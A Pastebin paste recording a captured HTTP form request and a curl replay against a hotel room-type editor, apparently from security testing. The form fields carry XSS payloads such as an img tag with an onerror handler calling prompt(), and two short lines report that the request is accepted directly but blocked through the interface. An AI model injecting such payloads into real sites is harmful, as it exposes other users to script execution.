API tools faq
paste
Advertisement
Guest User

Untitled

a guest
May 5th, 2021
297
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.57 KB | None | 0 0
raw download clone embed print report
  1.  
  2. POST /room_types/9378 HTTP/1.1
  3. Host: xyz.com
  4. Connection: close
  5. Content-Length: 2305
  6. Cache-Control: max-age=0
  7. sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
  8. sec-ch-ua-mobile: ?0
  9. Upgrade-Insecure-Requests: 1
  10. Origin: https://xyz.com
  11. Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuLcZiHUcx5FLD1A8
  12. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
  13. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  14. Sec-Fetch-Site: same-origin
  15. Sec-Fetch-Mode: navigate
  16. Sec-Fetch-User: ?1
  17. Sec-Fetch-Dest: document
  18. Referer: https://xyz.com/room_types/edit/9378
  19. Accept-Encoding: gzip, deflate
  20. Accept-Language: en-US,en;q=0.5
  21. Cookie: {{redacted}}
  22. x-browser: Chrome
  23.  
  24. ------WebKitFormBoundaryuLcZiHUcx5FLD1A8
  25. Content-Disposition: form-data; name="room_type[code]"
  26.  
  27. JRS
  28. ------WebKitFormBoundaryuLcZiHUcx5FLD1A8
  29. Content-Disposition: form-data; name="pms-code"
  30.  
  31.  
  32. ------WebKitFormBoundaryuLcZiHUcx5FLD1A8
  33. Content-Disposition: form-data; name="room_type[secondary_pms_codes][]"
  34.  
  35. <img src=a onerror=>
  36. ------WebKitFormBoundaryuLcZiHUcx5FLD1A8
  37. Content-Disposition: form-data; name="room_type[secondary_pms_codes][]"
  38.  
  39. <img src=a onerror=prompt(`IW`)>
  40. ------WebKitFormBoundaryuLcZiHUcx5FLD1A8
  41. Content-Disposition: form-data; name="room_type[number_of_rooms]"
  42.  
  43. 0
  44. ------WebKitFormBoundaryuLcZiHUcx5FLD1A8
  45. Content-Disposition: form-data; name="room_type[_localized][EN][name]"
  46.  
  47. Junior Suite<img src=a>
  48. ------WebKitFormBoundaryuLcZiHUcx5FLD1A8
  49. Content-Disposition: form-data; name="room_type[_localized][EN][description]"
  50.  
  51. <ul><li>Located on the top floor with a <strong>private balcony and amazing city views</strong></li><li>Enjoy more space with <strong>70 sqm</strong> of living space.</li><li><strong>Separate living room</strong> with comfortable couch.</li><li><strong>Luxury double beds</strong> with down duvets for maximum sleep comfort.</li></ul>
  52. ------WebKitFormBoundaryuLcZiHUcx5FLD1A8
  53. Content-Disposition: form-data; name="room_type[_localized][DE][name]"
  54.  
  55. Junior Suite<img src=a>
  56. ------WebKitFormBoundaryuLcZiHUcx5FLD1A8
  57. Content-Disposition: form-data; name="room_type[_localized][DE][description]"
  58.  
  59. <p>• Genießen Sie mehr Platz mit 70 m² Wohnfläche.</p><p>• Separates Wohnzimmer mit bequemer Couch</p><p>• Luxus-Doppelbetten mit Daunendecken für maximalen Schlafkomfort.</p><p>• Zimmer auf der obersten Etage mit eigenem Balkon und herrlichem Blick</p>
  60. ------WebKitFormBoundaryuLcZiHUcx5FLD1A8
  61. Content-Disposition: form-data; name="room_type[picture][]"; filename=""
  62. Content-Type: application/octet-stream
  63.  
  64.  
  65. ------WebKitFormBoundaryuLcZiHUcx5FLD1A8
  66. Content-Disposition: form-data; name="room_type[picture_position][16962]"
  67.  
  68. 1
  69. ------WebKitFormBoundaryuLcZiHUcx5FLD1A8
  70. Content-Disposition: form-data; name="room_type[picture_position][16959]"
  71.  
  72. 2
  73. ------WebKitFormBoundaryuLcZiHUcx5FLD1A8
  74. Content-Disposition: form-data; name="room_type[picture_position][16960]"
  75.  
  76. 3
  77. ------WebKitFormBoundaryuLcZiHUcx5FLD1A8--
  78.  
  79. I tried myself and the request was accepted too.
  80.  
  81. I then tried to submit the same string through the interface and it gets blocked. If I capture the request with Chrome dev tools and try to resubmit, I still get blocked
  82.  
  83. curl 'https://xyz.com/room_types/9378' \
  84. -H 'authority: xyz.com' \
  85. -H 'cache-control: max-age=0' \
  86. -H 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"' \
  87. -H 'sec-ch-ua-mobile: ?0' \
  88. -H 'upgrade-insecure-requests: 1' \
  89. -H 'origin: https://xyz.com' \
  90. -H 'content-type: multipart/form-data; boundary=----WebKitFormBoundaryBUFTMuBVsE7P1UZv' \
  91. -H 'user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36' \
  92. -H 'accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
  93. -H 'sec-fetch-site: same-origin' \
  94. -H 'sec-fetch-mode: navigate' \
  95. -H 'sec-fetch-user: ?1' \
  96. -H 'sec-fetch-dest: document' \
  97. -H 'referer: https://xyz.com/room_types/edit/9378' \
  98. -H 'accept-language: en-GB,en-US;q=0.9,en;q=0.8,it;q=0.7,es;q=0.6,de;q=0.5' \
  99. -H 'cookie: {{redacted}}' \
  100. --data-raw $'------WebKitFormBoundaryBUFTMuBVsE7P1UZv\r\nContent-Disposition: form-data; name="room_type[code]"\r\n\r\nJRS\r\n------WebKitFormBoundaryBUFTMuBVsE7P1UZv\r\nContent-Disposition: form-data; name="pms-code"\r\n\r\n\r\n------WebKitFormBoundaryBUFTMuBVsE7P1UZv\r\nContent-Disposition: form-data; name="room_type[secondary_pms_codes][]"\r\n\r\n<img src=a onerror=prompt(`IW`)>\r\n------WebKitFormBoundaryBUFTMuBVsE7P1UZv\r\nContent-Disposition: form-data; name="room_type[number_of_rooms]"\r\n\r\n0\r\n------WebKitFormBoundaryBUFTMuBVsE7P1UZv\r\nContent-Disposition: form-data; name="room_type[_localized][EN][name]"\r\n\r\nJunior Suite<img src=a>\r\n------WebKitFormBoundaryBUFTMuBVsE7P1UZv\r\nContent-Disposition: form-data; name="room_type[_localized][EN][description]"\r\n\r\n<ul><li>Located on the top floor with a <strong>private balcony and amazing city views</strong></li><li>Enjoy more space with <strong>70 sqm</strong> of living space.</li><li><strong>Separate living room</strong> with comfortable couch.</li><li><strong>Luxury double beds</strong> with down duvets for maximum sleep comfort.</li></ul>\r\n------WebKitFormBoundaryBUFTMuBVsE7P1UZv\r\nContent-Disposition: form-data; name="room_type[_localized][DE][name]"\r\n\r\nJunior Suite<img src=a>\r\n------WebKitFormBoundaryBUFTMuBVsE7P1UZv\r\nContent-Disposition: form-data; name="room_type[_localized][DE][description]"\r\n\r\n<p>• Genießen Sie mehr Platz mit 70 m² Wohnfläche.</p><p>• Separates Wohnzimmer mit bequemer Couch</p><p>• Luxus-Doppelbetten mit Daunendecken für maximalen Schlafkomfort.</p><p>• Zimmer auf der obersten Etage mit eigenem Balkon und herrlichem Blick</p>\r\n------WebKitFormBoundaryBUFTMuBVsE7P1UZv\r\nContent-Disposition: form-data; name="room_type[picture][]"; filename=""\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryBUFTMuBVsE7P1UZv\r\nContent-Disposition: form-data; name="room_type[picture_position][16962]"\r\n\r\n1\r\n------WebKitFormBoundaryBUFTMuBVsE7P1UZv\r\nContent-Disposition: form-data; name="room_type[picture_position][16959]"\r\n\r\n2\r\n------WebKitFormBoundaryBUFTMuBVsE7P1UZv\r\nContent-Disposition: form-data; name="room_type[picture_position][16960]"\r\n\r\n3\r\n------WebKitFormBoundaryBUFTMuBVsE7P1UZv--\r\n' \
  101. --compressed
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!